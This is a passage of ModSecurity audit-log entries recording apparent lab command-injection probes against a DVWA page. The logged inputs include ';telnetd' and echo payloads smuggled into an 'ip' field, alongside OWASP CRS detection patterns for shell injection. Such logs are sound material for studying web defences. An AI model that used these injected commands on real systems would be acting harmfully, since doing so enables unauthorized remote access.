\"]*(?:l[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"]* ...\" at ARGS:ip. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"81\"] [id \"932100\"] [rev \"4\"] [msg \"Remote Command Execution: Unix Command Injection\"] [data \"Matched Data: ;echo \\\\\\\\x22hellow found within ARGS:ip: ;echo \\\\\\\\x22hellow\\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"8\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-unix\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczZ38AAQEAAAmHBJMAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"(?i)(?:;|\\\\\\\\\\\\\\\\{|\\\\\\\\\\\\\\\\||\\\\\\\\\\\\\\\\|\\\\\\\\\\\\\\\\||&|&&|\\\\\\\\\\\\\\\\n|\\\\\\\\\\\\\\\\r|`)\\\\\\\\\\\\\\\\s*[\\\\\\\\\\\\\\\\(,@\\\\\\\\\\\\\\\\'\\\\\\\\\"\\\\\\\\\\\\\\\\s]*(?:[\\\\\\\\\\\\\\\\w'\\\\\\\\\"\\\\\\\\\\\\\\\\./]+/|[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"\\\\\\\\\\\\\\\\^]*\\\\\\\\\\\\\\\\w[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"\\\\\\\\\\\\\\\\^]*:.*\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\|[\\\\\\\\\\\\\\\\^\\\\\\\\\\\\\\\\.\\\\\\\\\\\\\\\\w '\\\\\\\\\"/\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\]*\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\)?[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*(?:m[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*(?:y[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*s[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*q[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*l(?:[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*(?:d[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*u[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*m[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*p(?:[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*s[\\\\\\\\\"\\\\\\\\\\\\\\\\^ ...\" at ARGS:ip. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"185\"] [id \"932110\"] [rev \"4\"] [msg \"Remote Command Execution: Windows Command Injection\"] [data \"Matched Data: ;echo found within ARGS:ip: ;echo \\\\\\\\x22hellow\\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-windows\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczZ38AAQEAAAmHBJMAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczZ38AAQEAAAmHBJMAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=0,HTTP=0,SESS=0): Remote Command Execution: Windows Command Injection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczZ38AAQEAAAmHBJMAAAAF\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":911,"p2":3883,"p3":0,"p4":0,"p5":186,"sr":40,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:25:23 --0400","transaction_id":"WRczc38AAQEAAAkW4RoAAAAB","remote_address":"192.168.75.145","remote_port":56764,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"POST /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/exec/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive","Content-Type":"application/x-www-form-urlencoded","Content-Length":"27"},"body":["ip=%3Btelnetd&Submit=Submit"]},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1408","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczc38AAQEAAAkW4RoAAAAB\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":594,"p2":2361,"p3":153,"p4":1613,"p5":75,"sr":24,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:25:38 --0400","transaction_id":"WRczgn8AAQEAAAkXs@YAAAAC","remote_address":"192.168.75.145","remote_port":56766,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"POST /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/exec/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive","Content-Type":"application/x-www-form-urlencoded","Content-Length":"56"},"body":["ip=192.168.75.134%3B+echo+%22helo+world%22&Submit=Submit"]},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/exec/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. 
Pattern match \"(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\\".*\\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\\"]*(?:l[\\\\\\\\'\\\"]* ...\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"81\"] [id \"932100\"] [rev \"4\"] [msg \"Remote Command Execution: Unix Command Injection\"] [data \"Matched Data: ; echo \\x22helo world found within ARGS:ip: 192.168.75.134; echo \\x22helo world\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"8\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-unix\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"]","Warning. Pattern match \"(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\\"\\\\s]*(?:[\\\\w'\\\"\\\\./]+/|[\\\\\\\\'\\\"\\\\^]*\\\\w[\\\\\\\\'\\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\\"/\\\\\\\\]*\\\\\\\\)?[\\\"\\\\^]*(?:m[\\\"\\\\^]*(?:y[\\\"\\\\^]*s[\\\"\\\\^]*q[\\\"\\\\^]*l(?:[\\\"\\\\^]*(?:d[\\\"\\\\^]*u[\\\"\\\\^]*m[\\\"\\\\^]*p(?:[\\\"\\\\^]*s[\\\"\\\\^ ...\" at ARGS:ip. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"185\"] [id \"932110\"] [rev \"4\"] [msg \"Remote Command Execution: Windows Command Injection\"] [data \"Matched Data: ; echo found within ARGS:ip: 192.168.75.134; echo \\x22helo world\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-windows\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=0,HTTP=0,SESS=0): Remote Command Execution: Windows Command Injection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczgn8AAQEAAAkXs@YAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"(?:;|\\\\\\\\\\\\\\\\{|\\\\\\\\\\\\\\\\||\\\\\\\\\\\\\\\\|\\\\\\\\\\\\\\\\||&|&&|\\\\\\\\\\\\\\\\n|\\\\\\\\\\\\\\\\r|\\\\\\\\\\\\\\\\$\\\\\\\\\\\\\\\\(|\\\\\\\\\\\\\\\\$\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\(|`|\\\\\\\\\\\\\\\\${|<\\\\\\\\\\\\\\\\(|>\\\\\\\\\\\\\\\\(|\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\s*\\\\\\\\\\\\\\\\))\\\\\\\\\\\\\\\\s*(?:{|\\\\\\\\\\\\\\\\s*\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\s*|\\\\\\\\\\\\\\\\w+=(?:[^\\\\\\\\\\\\\\\\s]*|\\\\\\\\\\\\\\\\$.*|\\\\\\\\\\\\\\\\$.*|<.*|>.*|\\\\\\\\\\\\\\\\'.*\\\\\\\\\\\\\\\\'|\\\\\\\\\".*\\\\\\\\\")\\\\\\\\\\\\\\\\s+|!\\\\\\\\\\\\\\\\s*|\\\\\\\\\\\\\\\\$)*\\\\\\\\\\\\\\\\s*(?:'|\\\\\\\\\")*(?:[\\\\\\\\\\\\\\\\?\\\\\\\\\\\\\\\\*\\\\\\\\\\\\\\\\[\\\\\\\\\\\\\\\\]\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\)\\\\\\\\\\\\\\\\-\\\\\\\\\\\\\\\\|+\\\\\\\\\\\\\\\\w'\\\\\\\\\"\\\\\\\\\\\\\\\\./\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\]+/)?[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"]*(?:l[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"]* ...\" at ARGS:ip. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"81\"] [id \"932100\"] [rev \"4\"] [msg \"Remote Command Execution: Unix Command Injection\"] [data \"Matched Data: ; echo \\\\\\\\x22helo world found within ARGS:ip: 192.168.75.134; echo \\\\\\\\x22helo world\\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"8\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-unix\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczgn8AAQEAAAkXs@YAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"(?i)(?:;|\\\\\\\\\\\\\\\\{|\\\\\\\\\\\\\\\\||\\\\\\\\\\\\\\\\|\\\\\\\\\\\\\\\\||&|&&|\\\\\\\\\\\\\\\\n|\\\\\\\\\\\\\\\\r|`)\\\\\\\\\\\\\\\\s*[\\\\\\\\\\\\\\\\(,@\\\\\\\\\\\\\\\\'\\\\\\\\\"\\\\\\\\\\\\\\\\s]*(?:[\\\\\\\\\\\\\\\\w'\\\\\\\\\"\\\\\\\\\\\\\\\\./]+/|[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"\\\\\\\\\\\\\\\\^]*\\\\\\\\\\\\\\\\w[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"\\\\\\\\\\\\\\\\^]*:.*\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\|[\\\\\\\\\\\\\\\\^\\\\\\\\\\\\\\\\.\\\\\\\\\\\\\\\\w '\\\\\\\\\"/\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\]*\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\)?[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*(?:m[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*(?:y[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*s[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*q[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*l(?:[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*(?:d[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*u[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*m[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*p(?:[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*s[\\\\\\\\\"\\\\\\\\\\\\\\\\^ ...\" at ARGS:ip. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"185\"] [id \"932110\"] [rev \"4\"] [msg \"Remote Command Execution: Windows Command Injection\"] [data \"Matched Data: ; echo found within ARGS:ip: 192.168.75.134; echo \\\\\\\\x22helo world\\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-windows\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczgn8AAQEAAAkXs@YAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczgn8AAQEAAAkXs@YAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=0,HTTP=0,SESS=0): Remote Command Execution: Windows Command Injection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczgn8AAQEAAAkXs@YAAAAC\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":488,"p2":15193,"p3":0,"p4":0,"p5":192,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:26:03 --0400","transaction_id":"WRczm38AAQEAAAkYuEsAAAAD","remote_address":"127.0.0.1","remote_port":42004,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 14:34:24 GMT","If-None-Match":"\"15a-54f68b7e775af\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:26:00 GMT","ETag":"\"1a8-54f6a470f3057\"","Accept-Ranges":"bytes","Content-Length":"424","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRczm38AAQEAAAkYuEsAAAAD\"]"],"stopwatch":{"p1":667,"p2":1658,"p3":113,"p4":393,"p5":94,"sr":29,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:26:04 --0400","transaction_id":"WRcznH8AAQEAAAkYuEwAAAAD","remote_address":"127.0.0.1","remote_port":42004,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id 